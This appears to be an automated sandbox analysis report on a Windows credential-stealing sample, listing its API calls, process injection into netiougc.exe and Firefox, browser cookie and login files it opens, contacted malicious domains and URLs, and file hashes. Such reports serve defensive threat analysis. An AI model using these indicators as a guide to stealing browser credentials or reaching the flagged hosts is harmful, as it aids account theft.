Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: NULL target: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netiougc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: NULL target: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: NULL target: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000002.2905275049.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897890801.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905634334.00000000018B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000002.2905275049.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897890801.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905634334.00000000018B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000002.2905275049.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897890801.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905634334.00000000018B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000002.2905275049.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897890801.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905634334.00000000018B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
81.4.100.198	www.mareomnia.com	Netherlands	198203	ASN-ROUTELABELNL	false
142.250.74.211	ghs.google.com	United States	15169	GOOGLEUS	false
43.132.189.227	www.eylmpwjot.store	Japan	4249	LILLY-ASUS	true
66.96.162.130	www.netgain360.online	United States	29873	BIZLAND-SDUS	true
203.161.49.220	www.hellokong.xyz	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true

Name	Malicious	Antivirus Detection	Reputation
http://www.eylmpwjot.store/3mcu/	true	Avira URL Cloud: safe	unknown
http://www.hellokong.xyz/ov93/	true	Avira URL Cloud: safe	unknown
http://www.artvectorcraft.store/jabf/	false	Avira URL Cloud: safe	unknown
http://www.netgain360.online/7w6o/	true	Avira URL Cloud: safe	unknown

Windows Analysis Report indent PWS-020199.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
indent PWS-020199.exe

Malware Threat Intel
Provided by

ID:	1465309
Product:	CloudBasic
Start time:	15:10:07
Start date:	01.07.2024
Sample:	indent PWS-020199.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	66800cae69c4278c8a33921d624b7528
SHA1:	e3abc9476cde1dc7ca5a2baa546534d625c0d325
SHA256:	64874958438945a29c66851bb23bcb9483955577e941e156d559885cca4a6910
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\indent PWS-020199.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Temp\3e3-f82u	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3